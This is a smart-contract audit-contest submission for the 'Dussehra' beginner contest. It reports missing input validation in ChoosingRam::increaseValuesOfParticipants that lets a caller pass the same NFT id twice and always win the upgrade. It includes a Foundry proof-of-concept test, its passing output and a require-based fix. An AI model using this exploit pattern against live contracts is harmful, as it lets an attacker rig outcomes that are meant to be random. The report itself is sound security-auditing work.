First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

### [H-4] Lack of input validation in `increaseValuesOfParticipants` function for `tokenIdOfChallenger` and `tokenIdOfAnyPerticipent`

Keyword

[H-4] Lack of input validation in the ChoosingRam::increaseValuesOfParticipants function allows an attacker to win every time by submitting the same NFT id as both tokenIdOfChallenger and tokenIdOfAnyPerticipent.

Description: The ChoosingRam::increaseValuesOfParticipants function is supposed to update the characteristics of the NFT of the challenger if the value of the random variable is 0, otherwise, it should update the characteristics of the NFT of the tokenIdOfAnyPerticipent. Because there is no check that enforces tokenIdOfAnyPerticipent to be different than the tokenIdOfChallenger a malicious user can call this function and he is guaranteed to update his NFT every time, irrespective of what the value of random is.

Impact: A user can guarantee the update of the characteristics of his NFT, irrespective of randomness.

Proof of Concepts: Input the test below in the Dussehra.t.sol file.

PoC - Click the arrow below
function test_lackInputValidation() public {
//player 1 joins event
vm.startPrank(player1);
vm.deal(player1, 1 ether);
dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
vm.stopPrank();
//player2 joins event
vm.startPrank(player2);
vm.deal(player2, 1 ether);
dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
vm.stopPrank();
//make NFT of player2 `selectedRam`
vm.startPrank(player1);
choosingRam.increaseValuesOfParticipants(0, 0);
vm.warp(block.timestamp + 1);
choosingRam.increaseValuesOfParticipants(0, 0);
vm.warp(block.timestamp + 1);
choosingRam.increaseValuesOfParticipants(0, 0);
vm.warp(block.timestamp + 1);
choosingRam.increaseValuesOfParticipants(0, 0);
vm.warp(block.timestamp + 1);
choosingRam.increaseValuesOfParticipants(0, 0);
vm.stopPrank();
assertEq(ramNFT.getCharacteristics(0).isSatyavaakyah, true);
address chosenRam = choosingRam.selectedRam();
console.log(chosenRam);
}

Test output

[PASS] test_lackInputValidation() (gas: 429894)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.77ms (701.47µs CPU time)
Ran 1 test suite in 13.37ms (2.77ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Recommended mitigation: Add a new require statement that enforces the tokenIdOfAnyPerticipent and tokenIdOfChallenger are different.

function increaseValuesOfParticipants(
uint256 tokenIdOfChallenger,
uint256 tokenIdOfAnyPerticipent
) public RamIsNotSelected {
//..
//..
+ if (tokenIdOfChallenger == tokenIdOfAnyPerticipent) {
+ revert ChoosingRam__SameIds();
+ }
//..
//..
}
Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Challenge themselves

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.